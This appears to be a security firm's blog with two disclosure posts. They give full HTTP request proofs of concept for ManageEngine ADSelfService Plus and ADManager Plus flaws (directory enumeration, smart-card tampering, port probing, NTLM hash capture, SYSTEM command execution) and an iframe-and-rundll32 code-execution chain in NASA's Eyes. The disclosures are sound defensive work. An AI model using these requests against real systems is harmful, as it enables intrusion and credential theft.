Wednesday, April 11, 2018

First 0DAY ALL DAY Event Findings


The first 0DAYALLDAY event was held on April 7th, 2018 from 11am to Midnight.  It was organized by Spectant Security and the Blackmarble group (blackmarble.sh):

https://blackmarble.sh/0-day-all-day/

0DAYALLDAY is a quarterly REAL "Hack-A-Thon" where security researchers from the DFW Metroplex come together to hunt for bugs in supplied software.

The first event was invitation only to work out the kinks and observe the feasibility and logistics of future events. You can find more information directly at the 0DAYALLDAY website: https://www.0dayallday.org/

The main software Spectant targeted was the Manage Engine AD Self Service Plus installation and the Manage Engine AD Manager Plus installation. The following table lists the issues found along with their risk scores:

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium
ADSelfService Plus Authenticated Host and Port Enumeration Medium
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

The following section describes the technical details for each finding.

Detailed Findings

Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration

Software Finding Risk Rating
ADSelfService Plus Unauthenticated Access to OrganizationChart.cc Allows Full AD Enumeration High

The default installation of Manage Engine's ADSelf Service Plus application allows anyone to search for employees or view an organizational chart.  By sending the following unauthenticated request an attacker can enumerate the entire domain:


GET /OrganizationChart.cc?methodToCall=show&selectedTab=dash HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/authorization.do
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


This chart on the surface shows various information about the user and the domain that user is associated with:

However, by viewing the returned HTML source code for the OrganizationChart.cc request much more detailed information is available about the underlying AD structure:


<div style="padding:3px 5px;" id="CN=Administrator,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=Guest,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...
<div style="padding:3px 5px;" id="CN=DefaultAccount,CN=Users,DC=blackmarble,DC=sh" domainname="blackmarble.sh">
...


Not only can a potential attacker obtain usernames, emails, phone numbers, and potential user photos of victims, they can also obtain what AD Domains they are apart of as well as what OU's they are in. Since the Organzation Chart displays a list of ALL users within the AD it is also possible for a potential attacker to determine what software is installed across the organization by observing which user system and service accounts are present. All of this can be combined to build and execute a very convicing social engineering attack.

Recommendation:

As a work around it is recommended that "Employee Search" be disabled from the Configuration options with ADSelfService Plus. However, Manage Engine should really but this search feature behind the authentication portal in the default install.

ANY User Can remove and enable/disable smart cards for other users

Software Finding Risk Rating
ADSelfService Plus ANY User Can remove and enable/disable smart cards for other users High

While doing cross account access testing it was discovered that the /WC/SmartCard.do application endpoint allowed even the lowest privileged user the ability to enable and disable any smart card configured in the system by directly interfacing with the endpoint. This is done by sending the following request:


POST /WC/SmartCard.do?mTCall=enableDisableSmartCard HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 79
Cookie: JSESSIONIDADSSP=00B684925C94F202DBF9139805493DD5; JSESSIONID=08C2A68C1BBF9E4E46ABE59844D3BBA3; NTLM_LOGGED_OUT=true; adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0; JSESSIONIDSSO=EBF4FB52BC685DC4A2FF9639FAF75D83
DNT: 1
Connection: close

IS_ENABLED=false&SMARTCARD_ID=1&URL=&adscsrf=075a0424-244c-46f9-a7b4-736384aa2ad0


The request above will cause the application to either enable or disable the smart card referenced with the SMARTCARD_ID parameter:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 132
Date: Wed, 11 Apr 2018 11:21:52 GMT
Connection: close

{"sSTATUS":"ads.admin.logon_settings.smartcard_settings.enable_disable_success","SMARTCARD_NEEDS_RESTART":false,"IS_ENABLED":false}


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to enable or disable smart card authentication requirements.

Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated ADSPOPUP Domain Users, Computers, Controllers Enumeration Medium

During testing it was also noted that even if the "Employee Search" option and OrganizationChart.cc endpoint were disabled it was still possible for the lowest privilege users to access full User, Group, Domain, and Computer/System lists from the /ADSPopupAction.do application endpoint.

This endpoint contains a method called getDataModelUIDesign that expects a JSON parameter string in a POST request. Within the JSON parameter you can specify an objectTypeId to enumerate the Users, Groups, Domains, and Computer/Systems. This is evident by sending the following request with objectTypeId: 2


POST /ADSPopupAction.do?methodToCall=getDataModelUIDesign HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/RestrictUsers.do?methodToCall=generate&action=staleAccountPage&init=true&selectedTab=admin&selectedTile=RestrictUsersSettings&domains=DC=blackmarble,DC=sh&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 261
Cookie: JSESSIONIDADSSP=CF41E5FBF4EE234934E3C64D4211352E; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=C77D3B15E0F4DB4A094B7303DF810027; adscsrf=969db194-807f-48d8-b8ff-63668b69b927;
DNT: 1
Connection: close

params={"popupId":5,"objectTypeId":2,"viewModelId":11,"domainName":"blackmarble.sh","allDomains":false,"isForestDomainsOnly":false,"colFilter":{},"popupDataModelId":11,"searchText":"","start":1,"end":100,"range":100}&adscsrf=969db194-807f-48d8-b8ff-63668b69b927


The above request will return a list of Users and their corresponding domain:



By changing the objectTypeId to 4 in the following request it is possible to see a full list of systems associated with the AD Domain including which systems are the designated Domain Controllers:


Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access any potentially sensitive objectTypeIds.

Authenticated Host and Port Enumeration

Software Finding Risk Rating
ADSelfService Plus Authenticated Host and Port Enumeration Medium

One of the more interesting endpoints discovered during testing was the /JumpToAction.do application endpoint. This endpoint contains a method called testConnection that expects a parameter called URL. If you supply a IP/URL and PORT combination the application attempts to connect to the supplied URL and PORT and returns success or failure depending on status of the connection:


POST /JumpToAction.do?mTCall=testConnection HTTP/1.1
Host: 127.0.0.1:7777
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7777/HASettings.do?selectedTab=admin&selectedTile=HASettings
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 73
Cookie: JSESSIONIDADSSP=2C1D14504E2E15CB00C7BD5F14D6BE17; JSESSIONID=2662D4981ACCAB8ACDA820D139269C7E; NTLM_LOGGED_OUT=true; adscsrf=7094a261-8a15-4492-ac0c-75b35a539700; JSESSIONIDSSO=8057D2014941CAC8031120C1E346B3C1
DNT: 1
Connection: close

URL=http://[REDACTED]:22/&adscsrf=7094a261-8a15-4492-ac0c-75b35a539700


The connection above will cause the system to check if PORT 22 is open on HOST [REDACTED]. Since this port is open it will return "success":


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 9
Date: Wed, 11 Apr 2018 12:24:07 GMT
Connection: close

success


Combining this with the ADSPOPUP vulnerability allows the attacker to potentially finger print the entire network based on open ports and software installed.

Recommendation:

It is recommended that only administrators or technicians with sufficient access rights be able to access the testConnection method of the JumpToAction.do application endpoint.

Admin DBBackup Remote Host Enumeration and SMB Capture

Software Finding Risk Rating
ADSelfService Plus Admin DBBackup Remote Host Enumeration and SMB Capture Informational

While testing the application it was noted that the admin account for the ADSelfService Plus application could execute database backups. This account could specify the local system path used for storing the database backups. The application does not validate that the path supplied by the admin is a valid local system path and will attempt to access any path supplied.

Using this knowledge, it is possible for an attacker with admin privileges to supply a remote UNC path for the database backup to be stored. This causes the system to attempt to authenticate with the remote, attacker supplied, system. During this attempted authentication the NTLMv2 has can be retrieved:


[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\MANAGEENGINE-01$
[SMB] NTLMv2-SSP Hash : MANAGEENGINE-01$::BLACKMARBLE:1122334455667788:57AB85[...SNIP...]380032002E8000000000000000000
[SMB] Requested Share : \\[REDACTED]\IPC$

[SMB] Requested Share : \\[REDACTED]\TEST2
[SMB] NTLMv2-SSP Client : [REDACTED]
[SMB] NTLMv2-SSP Username : BLACKMARBLE\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::BLACKMARBLE:1122334455667788:D7446276CF[...SNIP...]3100330038000000000000000000


Recommendation:

It is recommended that the application verify that the administrator is only supplying local system paths.

Application Admin can Run Commands as SYSTEM via User Modification Scripts

Software Finding Risk Rating
ADManager Plus Application Admin can Run Commands as SYSTEM via User Modification Scripts Informational

It was noted during testing that there is a section of the user modification where the admin can supply a custom script that executes immediately. By sending the following requset:


POST /ExecuteForm.do?methodToCall=submitExecuteLayout&templateCategoryId=6&isWorkFlowMode=false HTTP/1.1
Host: 127.0.0.1:7778
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:7778/ExecuteForm.do?methodToCall=init&operation=singleModify&templateCategoryId=6&guid={E034A7E7-0ED8-4761-82A0-C92E3304F943}&domainName=blackmarble.sh
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 146672
Cookie: JSESSIONIDADSSP=973B256F550EEAF12D8858EC8C3D1601; JSESSIONID=70D75AB6A980017519AE98671F18838A; NTLM_LOGGED_OUT=true; JSESSIONIDSSO=DC158F7DF0B24F4DC0A4884CAD8C74CD; adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1; CUSTOM_SSO_TICKET=1523459129211; CUSTOM_SSO_APP_NAME="ManageEngine ADManager Plus"; CUSTOM_SSO_APP_TAG_NAME=ADMP; APPS_PANE_LOADED=true
DNT: 1
Connection: close

FcExecuteLayout= ...[SNIP]...
{"tabId":"32","tabName":"Custom%20Attributes","layoutId":"8","tabSeq":"7","isO365Tab":"false","description":"description","isHidden":"false","FcRhsLayoutSubTabGroup":[{"tabId":"32","subTabGroupId":"32","subTabGroupName":"Custom%20Attributes","isOptionTab":"false","isCustomTab":"true","optionTabType":"","FcRhsLayoutSubTab":[{"subTabId":"37","subTabGroupId":"32","subTabName":"Custom%20Attributes","subTabType":"","isDefaultSelectedSubTab":"false","isHidden":"true","lhsSubTabId":"18","fieldGroupsStatusMsg":"No%20Field%20Groups%20are%20available.","FcRhsLayoutFieldGroup":[{"fieldGroupId":"55","subTabId":"37","fieldGroupName":"Custom%20Attributes","description":"Description","fieldGroupSeq":"1","isSingleColumn":"false","isHidden":"false","FcRhsLayoutField":[{"ComponentVals":{"scriptEnabled":true,"scriptCommand":"whoami","ignoreWarning":true},"AvoidDuplicationDetails":{"duplicationLevel":"","isApplyNamingFormat":"false","stopExecution":"false","isAppendingNumber":"true","isAppendCharsSpecified":"false","appendStartIndex":"2","suffixLength":"2","fillingChars":"0","formatId":"-1"},"layoutFieldId":"245","fieldGroupId":"55","fieldId":"2616","componentId":"57","attribSeq":"1","isHidden":"false","position":"RHS","attribDisplayText":"Custom%20Script","defaultValue":"","isMandatory":"false","isReadOnly":"false","isEnabledForBulkEdit":"false","isAvoidDuplication":"false","isImmdeiateDuplicationCheck":"false","isCustomField":"false","minLen":"2","maxLen":"255","systemRestrictedLength":"255","helpText":"","isDomainSpecificField":"false","domainSpecificDataProviderClassName":"","validationIds":"","isAvailableInTemplate":"true","isRestricted":"false","isAuthorized":"true","isComponentLevelAuthorized":"false","iamAppId":"1","parentFieldId":"0","childFieldArr":[]}]}]}]}]}]}&templateId=8&isCopiedObject=false&isDirectCopyObject=false&isOverWriteADValue=true&adscsrf=b398f7f6-226a-40d2-94dd-eec6f79759e1


This request (redacted for length) causes the application to immediately execute the "whoami" command and respond with the output of that command:


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
expires: 1970-01-01 05:30:00
pragma: no-cache
cache-control: no-cache, no-store
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Date: Wed, 11 Apr 2018 15:07:25 GMT
Connection: close
Content-Length: 197494


...[SNIP]...

</table></td> <td width="10%" valign="top" align="right"><a class="linkblacktxt" href="javascript:hideStatusTable();"><img src="images/delete.gif" width="9" height="9" border="0"> Close</a><td></tr> <tr><td colspan="2" align="center"><span align="center" class="blacktxt">Custom script result: nt authority\system </span></span></td></tr></table></td> <td background="images/blue/gray_right_bgline.gif"><img src="images/blue/gray_right_bgline.gif" width="6" height="1"></td></tr><tr><td width="6" height="6" valign="top"><img src="images/blue/gray_botleft_curve.gif" width="6" height="6"></td> <td height="6" background="images/blue/gray_bot_bgline.gif"><img src="images/blue/gray_bot_bgline.gif" width="1" height="6"></td> <td width="6" height="6" valign="top"><img src="images/blue/gray_botright_curve.gif" width="6" height="6"></td></tr></table></td></tr></table><br></div>

Recommendation:

Since this is purely an informational finding and only noted to help anyone who may stumble upon an admin account for this application during a penetration test, there is no real recommendation. However, it should be noted that there should be the ability to disable this functionality and/or use a different system level account during installation to prevent potential system compromise.

Monday, July 17, 2017

Client Side Remote Code execution in NASA's Eyes Application


Spectant Security analyzed the application during installation as well as during its normal functioning window. The following section details the activities and actions performed during the research.

During standard User Interface (UI) research the NASA's Eyes web site (eyes.nasa.gov) was discovered and viewed. It was noted that a custom application was used along with a custom "eyes://" URI linked off the various pages of the web site. The eyes:// URI along with the underlying launcher and viewer application were analyzed for potential weaknesses in their security.

Once installed, the NASA's Eyes application appears to be a QT GUI wrapper around the unity player. The URI's to launch the application are structured like (Textbox 1):


eyes:///?scene=$SERVERURL/content/scenes/default.xml&interface=$SERVERURL/content/interface/default/default.xml&document=$SERVERURL/content/documents/cassini/cassini.xml

Textbox 1: Raw URI string to launch the NASA's Eyes Application from a web site

$SERVERURL isn't set anywhere on the site and is pre-configured within the viewer. You can see this from within the extremely verbose output_log.txt file in the AppData path of the viewer (Textbox 2):


Replacements
$SERVERURL -> http://eyes.nasa.gov/server
$PROTOCOL -> eyesReplacements

Textbox 2: Raw output_log.txt output showing the $SERVERURL parameter

Also in the output_log.txt file is a list of retrieved files that the viewer uses for building the various models and animations for the application (Textbox 3):


Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/interface/default/default.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/basic_camerawork.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/advanced_camerawork.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/control_scripts.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/timeline_hds_2.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/calendar_hds.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/gallery_hds_2.xml'
Successfully downloaded and parsed 'http://eyes.nasa.gov/server/content/documents/cassini/styles.xml'

Textbox 3: Raw output_log.txt output showing resources downloaded over HTTP

One interesting thing to note is that during testing all the resource files used within the application were accessed and downloaded over HTTP instead of HTTPS.

The downloaded resource files were analyzed to determine if there was anything that could be modified to gain access to the underlying system running the browser/NASA's Eyes application.

During this analysis, it was discovered that the application doesn't store the files in their default format. Instead, it creates another directory in a different AppData path and stores them with unpredictable names in a cache folder along with an index.csv to manage the naming translations. Wireshark was used to verify that the downloaded files were still being served via HTTP (Image 1):


Image 1: Wireshark Screenshot showing resources being downloaded over HTTP

This confirmed the use of unity player as well as files being downloaded over HTTP. It also confirmed the use of QT GUI using the QTWebKit.
The next step was to attempt to serve a custom XML document within the eyes:// URI string to see if the player would perform any validation on it and/or attempt to render it. The following code is a simple HTML which attempts to cause the NASA's Eyes application to launch and render a custom XML resource (Textbox 4):


<head>
</head>
<body>
<iframe style="width:0px; height:0px;" src="eyes:///?scene=$SERVERURL/content/scenes/default.xml&interface=$SERVERURL/content/interface/default/default.xml&document=http://127.0.0.1/eye_test.xml">
</body>
</html>

Textbox 4: Example HTML file that will launch the NASA's Eyes application with 3rd party resource

By accessing this page in a browser, the launcher automatically starts and all the xml files are rendered correctly including the one served from the local host as evident by the output_log.txt file (Textbox 5):


Successfully downloaded and parsed 'http://127.0.0.1/eye_test.xml'

Textbox 5: Raw output_log.txt output showing the download and render of 3rd party resource

The eye_test.xml file was modified to attempt to execute the Windows CALC.EXE application (Image 2):


Image 2: Resource modification to execute CALC.EXE on target machine

When the viewer loaded, CALC.EXE was executed once the scene had been rendered (Image 3):


Image 3: Screenshot of CALC.EXE being executed on target machine

Using process monitor it was discovered that the OpenURL call eventually landed on a rundll32.exe call which loaded url.dll with the FileProtocolHandler function (Textbox 6):


PID: 756, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/WINDOWS/System32/calc.exe

Parent PID: 9188, Command line: "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler file:///C:/WINDOWS/System32/calc.exe

Textbox 6: Process Monitor output showing the rundll32 call from the NASA's Eyes application

Now that we know we can control the URI handler and full path that gets passed to url.dll using rundll32.exe, we can execute code on the machine running the launcher by using an executable on a remote windows/smb share by modifying the custom resource to point to the remote windows/smb share (Image 4):


Image 4: Resource modification to execute a remote TEST.EXE on target machine

Once that XML file is rendered, the launcher will download and execute the test.exe application on the target machine (Image 5):


Image 5: Screenshot of TEST.EXE being execute on the target machine

Recommendations


It is recommended that all external resources be loaded over SSL with certificate validation from within the client application. It is also recommended to add a configuration file with approved external resource locations.

Disclosure Timeline


4/27/2017 - Contacted NASA Eye's Site Administrator - No Response
4/28/2017 - Called NASA SOC for Identified Security Issues - Was told to submit report to SOC
4/28/2017 - Sent Vulnerability Report to NASA SOC - No Response
5/02/2017 - Follow Up Requesting Response - No Response
7/27/2017 - Publish Findings